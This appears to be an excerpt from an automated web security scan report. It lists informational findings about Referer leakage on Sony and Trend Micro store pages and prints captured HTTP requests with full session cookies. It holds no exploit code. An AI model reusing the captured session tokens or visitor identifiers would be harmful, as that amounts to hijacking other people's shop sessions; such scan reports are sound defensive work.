GET /webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0 HTTP/1.1/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.305161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%2C%5B%27Sony.com%27%2C%271315352999758%27%5D%5D; _ensChanVal=Sony.com|1315352999758; c_m=undefinedwww.sony.comwww.sony.com; mbox=session#1315352920400-736912#1315354869|PC#1315334914578-928682.19#1316562609|check#true#1315353069; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898; ensUID=249118483jocCbfxsy2s; s_cc=true; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.4.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=30cc9Vvxqa6wQXKxm9IK6%2b5q3UA%3d%0a%3b2011%2d09%2d06+14%3a50%3a04%2e135%5f1315334975092%2d379806%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRPmhzB%2bzw9Hf%2fk%0avAS8zE7kY2MFDR47%2bjrT%2feKhy5Vt%2fbmyZW1xdwGzL47LAIe6LPqhTSHgSmDSMg08YS1X10MAnA%3d%3d; WC_GENERIC_ACTIVITYDATA=[1251466011%3atrue%3afalse%3a0%3aYVz6KpFhKSHbYH9BUDYIQv3N0r4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10551%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; TS5bbf46=86861eed5e5f703c738ac8ed0955e019238741ed7a8234554e666b3fdb233202e0e51d0c222f7b4e21a038ea; fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay","pv":4,"lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253Dcontent%25253AS_Blu-Ray_Disc_Player%2526pidt%253D1%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE%26sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%25253D-1%252526categoryId%25253D16192%252526SR%25253Dnav%25253Aelectronics%25253Atv_hm_ent%25253Abluray%25253Ashop_compare%25253Ass%252523%25252Fbluray%2526oid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%2526ot%253DA
Response
HTTP/1.1 200 OK/html4/strict.dtd">-Compatible" content="IE=8" /><script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js"> ...[SNIP]... <a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank"> Facebook</a></li><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/SonyStore" target="_blank"> Twitter</a></li><a class="socialLogo bloggerLogo seoImage" href="http://blog.discover.sonystyle.com/" target="_blank"> Blog</a></li><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank"> YouTube</a></li><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank"> Flickr</a>...[SNIP]... <a class="comBigPromoLink seoImg" rel="Community: SGNL By Sony" href="http://discover.sonystyle.com/sgnl/#"> ...[SNIP]... <a class="comBigPromoLink seoImg" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"> ...[SNIP]... <a class="comBigPromoLink seoImg" rel="Community: Twitter" href="http://twitter.com/SonyStore" target="_blank"> ...[SNIP]... <a class="catItemLink" rel="Community: Facebook" href="http://www.facebook.com/sonyelectronics" target="_blank"> <span class="facebookLogo socialLogo">...[SNIP]... <a class="catItemLink" rel="Community: Twitter" href="http://www.twitter.com/SonyStore" target="_blank"> <span class="twitterLogo socialLogo">...[SNIP]... <a class="catItemLink" rel="Community: Sony Blog" href="http://blog.discover.sonystyle.com/" target="_blank"> <span class="bloggerLogo socialLogo">...[SNIP]... <a class="catItemLink" rel="Community: YouTube" href="http://www.youtube.com/user/sonyelectronics" target="_blank"> <span class="youtubeLogo socialLogo">...[SNIP]... <a class="catItemLink" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"> <span class="flickrLogo socialLogo">...[SNIP]... <a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank"> Facebook</a></li><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/SonyStore" target="_blank"> Twitter</a></li><a class="socialLogo bloggerLogo seoImage" href="http://blog.discover.sonystyle.com/" target="_blank"> Blog</a></li><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank"> YouTube</a></li><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank"> Flickr</a>...[SNIP]... ryListItem"><a href="http://www.sonycreativesoftware.com/" target="_blank" id="sonyCreativeGlobalFooterLink" rel="" class="directoryListingLink"> Sony Creative Software</a>...[SNIP]... <img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0" </noscript>...[SNIP]...
12.5. http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://store.sony.com
Path:
/webapp/wcs/stores/servlet/StoreCatalogDisplay
Issue detail
The page was loaded from a URL containing a query string:http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551 http://blog.discover.sonystyle.com/ http://discover.sonystyle.com/sgnl/ http://nexus2.ensighten.com/sony/Bootstrap.js http://twitter.com/SonyStore http://www.facebook.com/sonyelectronics http://www.flickr.com/groups/sonycameraclub http://www.flickr.com/groups/sonycameraclub/ http://www.sonycreativesoftware.com/ http://www.twitter.com/SonyStore http://www.youtube.com/user/sonyelectronics https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0
Request
GET /webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.305161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-strict.dtd">-Compatible" content="IE=8" /><script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js"> ...[SNIP]... <a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank"> Facebook</a></li><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/SonyStore" target="_blank"> Twitter</a></li><a class="socialLogo bloggerLogo seoImage" href="http://blog.discover.sonystyle.com/" target="_blank"> Blog</a></li><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank"> YouTube</a></li><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank"> Flickr</a>...[SNIP]... <a class="comBigPromoLink seoImg" rel="Community: SGNL By Sony" href="http://discover.sonystyle.com/sgnl/#"> ...[SNIP]... <a class="comBigPromoLink seoImg" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"> ...[SNIP]... <a class="comBigPromoLink seoImg" rel="Community: Twitter" href="http://twitter.com/SonyStore" target="_blank"> ...[SNIP]... <a class="catItemLink" rel="Community: Facebook" href="http://www.facebook.com/sonyelectronics" target="_blank"> <span class="facebookLogo socialLogo">...[SNIP]... <a class="catItemLink" rel="Community: Twitter" href="http://www.twitter.com/SonyStore" target="_blank"> <span class="twitterLogo socialLogo">...[SNIP]... <a class="catItemLink" rel="Community: Sony Blog" href="http://blog.discover.sonystyle.com/" target="_blank"> <span class="bloggerLogo socialLogo">...[SNIP]... <a class="catItemLink" rel="Community: YouTube" href="http://www.youtube.com/user/sonyelectronics" target="_blank"> <span class="youtubeLogo socialLogo">...[SNIP]... <a class="catItemLink" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"> <span class="flickrLogo socialLogo">...[SNIP]... <a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank"> Facebook</a></li><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/SonyStore" target="_blank"> Twitter</a></li><a class="socialLogo bloggerLogo seoImage" href="http://blog.discover.sonystyle.com/" target="_blank"> Blog</a></li><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank"> YouTube</a></li><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank"> Flickr</a>...[SNIP]... ryListItem"><a href="http://www.sonycreativesoftware.com/" target="_blank" id="sonyCreativeGlobalFooterLink" rel="" class="directoryListingLink"> Sony Creative Software</a>...[SNIP]... <img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0" </noscript>...[SNIP]...
12.6. https://store.trendmicro.com/DRHM/store
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://store.trendmicro.com
Path:
/DRHM/store
Issue detail
The page was loaded from a URL containing a query string:https://store.trendmicro.com/DRHM/store?Action=DisplayCheckoutPaymentPage&SiteID=tmamer&Locale=en_US https://a248.e.akamai.net/f/248/5462/2h/www.digitalriver.com/v2.0-img/images/trend/favicon.ico https://display.digitalriver.com/?aid=244&tax=trend_micro https://drh.img.digitalriver.com/DRHM/Storefront/Site/eddy/cm/multimedia/commonFunctions.js https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/images/Aug09/cartheadblack_b.gif https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/images/images/logotrendmicro_3d_tagline_b.gif https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_CheckoutPaymentAnonymousPage_contentBody.js https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_globalTrial.js https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/browser_os_detect.js https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/jqCookie.js https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/js/jquery.maskedinput-1.1.4.pack.js https://drh.img.digitalriver.com/store?Action=DisplayContentManagerStyleSheet&SiteID=tmamer&StyleID=1780400&StyleVersion=42&styleIncludeFile=style.css https://drh1.img.digitalriver.com/DRHM/Storefront/Library/images/dr_logo_0209.gif https://drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/cc_mc_en_US.gif https://drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/cc_paypal_logo.gif https://drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/icon_printer.gif https://drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/pageLoading_en_US.gif https://drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/close_en_US.gif https://libs.coremetrics.com/eluminate.js https://seal.verisign.com/getseal?host_name=store.trendmicro.com&size=M&use_flash=YES&use_transparent=YES&lang=en
Request
GET /DRHM/store?Action=DisplayCheckoutPaymentPage&SiteID=tmamer&Locale=en_US HTTP/1.1.com/store?Action=DisplayPage&Locale=en_US&SiteID=tmamer&id=ShoppingCartPage/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.129:260-0#0"; JSESSIONID=74CA66C6686E81F96F871B79152A151D; VISITOR_ID=971D4E8DFAED43672BD9EDEF2E7090049E8F29A9B6FF10E6; BIGipServerp-drh-dc2pod9-pool1-active=2164392458.260.0000; __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; __qca=P0-1869591235-1315350993064; bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%22%2C%22r%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Ftrend-micro-researchers-identify-vulnerability-in-hotmail%2F%22%2C%22t%22%3A1315351267113%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fcategory%2Fpharming%2F%22%2C%22l%22%3A%22Pharming%22%2C%22de%22%3A%7B%22su%22%3A%22Malware%20blog%20by%20TrendLabs%20provides%20internet%20security%20research%20information%20on%20worms%20viruses%20trojans%20adware%20and%20other%20internet%20threats%20and%20discusses%20how%20to%20protect%20your%20computer%20data%20from%20being%20hijacked%22%2C%22ti%22%3A%22Malware%20Blog%20%7C%20TrendLabs%20-%20by%20Trend%20Micro%22%2C%22nw%22%3A1544%2C%22nl%22%3A162%7D%7D
Response
HTTP/1.1 200 OK.1.2.0.2 (TN;ecid=24051346139,0)/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">...[SNIP]... <link rel="icon" href="//a248.e.akamai.net/f/248/5462/2h/www.digitalriver.com/v2.0-img/images/trend/favicon.ico" type="image/x-icon" /> <link rel="shortcut icon" href="//a248.e.akamai.net/f/248/5462/2h/www.digitalriver.com/v2.0-img/images/trend/favicon.ico" type="image/x-icon" /> ...[SNIP]... <link rel="stylesheet" href="https://drh.img.digitalriver.com/store?Action=DisplayContentManagerStyleSheet&SiteID=tmamer&StyleID=1780400&StyleVersion=42&styleIncludeFile=style.css" type="text/css" media="all" /> =DisplayESIPage&Currency=USD&ESIHC=2ad48102&Env=BASE&Locale=en_US&SiteID=tmamer&StyleID=1780400&StyleVersion=42&ceid=177147900&cename=TopHeader&id=CheckoutPaymentAno...[SNIP]... <script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/eddy/cm/multimedia/commonFunctions.js"> </script>...[SNIP]... <script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_globalTrial.js"> </script><script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_CheckoutPaymentAnonymousPage_contentBody.js"> </script>...[SNIP]... <script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/jqCookie.js"> </script><script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/browser_os_detect.js"> </script>...[SNIP]... <script src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/js/jquery.maskedinput-1.1.4.pack.js" type="text/javascript"> </script>...[SNIP]... .trendmicro.com/store"><img src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/images/images/logotrendmicro_3d_tagline_b.gif" alt="Trend Micro: Securing your Journey to the Cloud" height="50" width="305"> </a>...[SNIP]... <script src=https://seal.verisign.com/getseal?host_name=store.trendmicro.com&size=M&use_flash=YES&use_transparent=YES&lang=en> </script>...[SNIP]... <img src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/images/Aug09/cartheadblack_b.gif" height="27" alt="shopping cart" /> ...[SNIP]... DetailsPayPalExpress"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/cc_paypal_logo.gif" border="0" align="left" valign="middle" id="dr_paypalExpressImage"> Make a payment from your new or existing PayPal account. Be sure to use your PayPal login as your order email address....[SNIP]... <img src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/cc_mc_en_US.gif" alt="We Accept all Major Credit Cards" border="0"/> </p>...[SNIP]... ;margin-top:-30px;"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/pageLoading_en_US.gif" border="0" /> ...[SNIP]... <img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/close_en_US.gif" align="right" alt="Close Window" border="0"/> </a>...[SNIP]... _US/DisplayDRAboutDigitalRiverPage" target="DrOverlayIframe"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/images/dr_logo_0209.gif" width="115" height="27" alt="Digital River" border="0"> </a>...[SNIP]... <img border="0" src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/icon_printer.gif" alt="Print"/> </a>...[SNIP]... <script language="javascript1.2" src="//libs.coremetrics.com/eluminate.js" type="text/javascript"> ...[SNIP]... ############## --><script src="https://display.digitalriver.com/?aid=244&tax=trend_micro" type="text/javascript" defer="defer"> </script>...[SNIP]...
12.7. https://store.trendmicro.com/store
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://store.trendmicro.com
Path:
/store
Issue detail
The page was loaded from a URL containing a query string:https://store.trendmicro.com/store?Action=DisplayPage&Locale=en_US&SiteID=tmamer&id=ShoppingCartPage https://a248.e.akamai.net/f/248/5462/2h/www.digitalriver.com/v2.0-img/images/trend/favicon.ico https://display.digitalriver.com/?aid=244&tax=trend_micro https://drh.img.digitalriver.com/DRHM/Storefront/Site/eddy/cm/multimedia/commonFunctions.js https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/images/30DayMBSG-CMYK-Burst_sm2.gif https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/images/Aug09/carthead_b.gif https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/images/images/cartPaymentOptions3.gif https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/images/images/logotrendmicro_3d_tagline_b.gif https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_ShoppingCartPage_contentBody.js https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_globalTrial.js https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/browser_os_detect.js https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/jqCookie.js https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/pb/images/siteOpt/cdimg.png https://drh.img.digitalriver.com/store?Action=DisplayContentManagerStyleSheet&SiteID=tmamer&StyleID=1876500&StyleVersion=55&styleIncludeFile=style.css https://drh1.img.digitalriver.com/DRHM/Storefront/Company/tmamer/images/product/thumbnail/SSM542.jpg https://drh1.img.digitalriver.com/DRHM/Storefront/Company/tmamer/images/product/thumbnail/TiAV542.gif https://drh1.img.digitalriver.com/DRHM/Storefront/Library/images/dr_logo_0209.gif https://drh1.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/buttons/add2.jpg https://drh1.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/buttons/continuecheckout2.jpg https://drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/cdo_arrow.gif https://drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/icon_printer.gif https://drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/pageLoading_en_US.gif https://drh2.img.digitalriver.com/DRHM/Storefront/Company/tmamer/images/product/thumbnail/pixel.gif https://drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/close_en_US.gif https://drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/sc_continueshopping_en_US.gif https://libs.coremetrics.com/eluminate.js https://seal.verisign.com/getseal?host_name=store.trendmicro.com&size=M&use_flash=YES&use_transparent=YES&lang=en https://www.hiconversion.com/enabling/update.jsp?external=&version=1.0
Request
GET /store?Action=DisplayPage&Locale=en_US&SiteID=tmamer&id=ShoppingCartPage HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.129:260-0#0"; JSESSIONID=74CA66C6686E81F96F871B79152A151D; VISITOR_ID=971D4E8DFAED43672BD9EDEF2E7090049E8F29A9B6FF10E6; BIGipServerp-drh-dc2pod9-pool1-active=2164392458.260.0000; __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.2.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fhome%2Fhome-user%2F%22%2C%22r%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fhome%2F%22%2C%22t%22%3A1315350861448%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fwww.trendsecure.com%2Fcommonapi%2Fredirect.php%3Fl%3Den-US%26a%3DMT-EN%22%2C%22l%22%3A%22My%20Account%20Log-In%5Cn%22%2C%22de%22%3A%7B%22su%22%3A%22Free%20online%20virus%20scan%20and%20antivirus%20trial%20downloads.%20Get%20it%20only%20from%20TrendMicro.com!%22%2C%22ti%22%3A%22Home%20%26%20Home%20Office%20%7C%20Internet%20Security%20Software%22%2C%22nw%22%3A253%2C%22nl%22%3A225%7D%7D; fsr.s={"v":1,"rid":"1315350793273_559343","pv":2,"to":3.5,"c":"http://us.trendmicro.com/us/home/home-user/","lc":{"d1":{"v":2,"s":true}},"cd":1,"sd":1,"f":1315350865822}
Response
HTTP/1.1 200 OK.1.2.0.2 (TN;ecid=101360405795,0)/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">...[SNIP]... <link rel="icon" href="//a248.e.akamai.net/f/248/5462/2h/www.digitalriver.com/v2.0-img/images/trend/favicon.ico" type="image/x-icon" /> <link rel="shortcut icon" href="//a248.e.akamai.net/f/248/5462/2h/www.digitalriver.com/v2.0-img/images/trend/favicon.ico" type="image/x-icon" /> " content="434533e2-78c9-5cfe-f9ed-c2bcbc0c2e76/1/6/4147">...[SNIP]... <link rel="stylesheet" href="https://drh.img.digitalriver.com/store?Action=DisplayContentManagerStyleSheet&SiteID=tmamer&StyleID=1876500&StyleVersion=55&styleIncludeFile=style.css" type="text/css" media="all" /> =DisplayESIPage&Currency=USD&ESIHC=2ad48102&Env=BASE&Locale=en_US&SiteID=tmamer&StyleID=1876500&StyleVersion=55&ceid=177147900&cename=TopHeader&id=ShoppingCartPage"-...[SNIP]... <script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/eddy/cm/multimedia/commonFunctions.js"> </script>...[SNIP]... <script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_globalTrial.js"> </script><script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_ShoppingCartPage_contentBody.js"> </script>...[SNIP]... <script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/jqCookie.js"> </script><script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/browser_os_detect.js"> </script>...[SNIP]... <script id='hiconversion_head_include' type='text/javascript' src='https://www.hiconversion.com/enabling/update.jsp?external=&version=1.0'> </script>...[SNIP]... .trendmicro.com/store"><img src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/images/images/logotrendmicro_3d_tagline_b.gif" alt="Trend Micro: Securing your Journey to the Cloud" height="50" width="305"> </a><script src="https://seal.verisign.com/getseal?host_name=store.trendmicro.com&size=M&use_flash=YES&use_transparent=YES&lang=en"> </script>...[SNIP]... <img src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/images/Aug09/carthead_b.gif" height="27" alt="shopping cart" /> ...[SNIP]... "><img src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/images/30DayMBSG-CMYK-Burst_sm2.gif" /> </div>...[SNIP]... <img alt="Titanium AntiVirus+ - 1 year" src="//drh1.img.digitalriver.com/DRHM/Storefront/Company/tmamer/images/product/thumbnail/TiAV542.gif" border="0"/> </div>...[SNIP]... <img alt="Smart Surfing for Mac - 1 year Complimentary Copy" src="//drh1.img.digitalriver.com/DRHM/Storefront/Company/tmamer/images/product/thumbnail/SSM542.jpg" border="0"/> </div>...[SNIP]... =DisplayBackUpCDInformationPage&SiteID=tmamer&Locale=en_US&Env=BASE" onclick="popUp(this.href,'BackupCD',410,360);return false;" target="_blank"><img src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/pb/images/siteOpt/cdimg.png" border="0" class="backupcdimage" /> ">...[SNIP]... =AddItemToRequisition&SiteID=tmamer&Locale=en_US&Env=BASE&productID=8350200&productDataID=1934000000" onClick="q=false"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/buttons/add2.jpg" border="0" name="Add_8350200" /> </a>...[SNIP]... <img src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/images/images/cartPaymentOptions3.gif" alt="Visa, Master Card, Discover, American Express, Diner's Club International, JCB, PayPal, Wire Transfer" /> </td>...[SNIP]... _overlay_arrow"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/cdo_arrow.gif"/> </div>...[SNIP]... (closeProductDetailsOverlay())" title="Close Window" onmouseover="self.status='Close Window';return true;" onmouseout="self.status='';return true;"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/close_en_US.gif" alt="Close Window" align="right" border="0" /> </a>...[SNIP]... <img class="dr_cart_details_overlay_boxshot" align="left" alt="Titanium AntiVirus+ - 1 year" src="//drh1.img.digitalriver.com/DRHM/Storefront/Company/tmamer/images/product/thumbnail/TiAV542.gif" border="0"/> _overlay_description">...[SNIP]... _overlay_arrow"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/cdo_arrow.gif"/> </div>...[SNIP]... (closeProductDetailsOverlay())" title="Close Window" onmouseover="self.status='Close Window';return true;" onmouseout="self.status='';return true;"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/close_en_US.gif" alt="Close Window" align="right" border="0" /> </a>...[SNIP]... <img class="dr_cart_details_overlay_boxshot" align="left" alt="Smart Surfing for Mac - 1 year Complimentary Copy" src="//drh1.img.digitalriver.com/DRHM/Storefront/Company/tmamer/images/product/thumbnail/SSM542.jpg" border="0"/> _overlay_description">...[SNIP]... _overlay_arrow"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/cdo_arrow.gif"/> </div>...[SNIP]... (closeProductDetailsOverlay())" title="Close Window" onmouseover="self.status='Close Window';return true;" onmouseout="self.status='';return true;"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/close_en_US.gif" alt="Close Window" align="right" border="0" /> 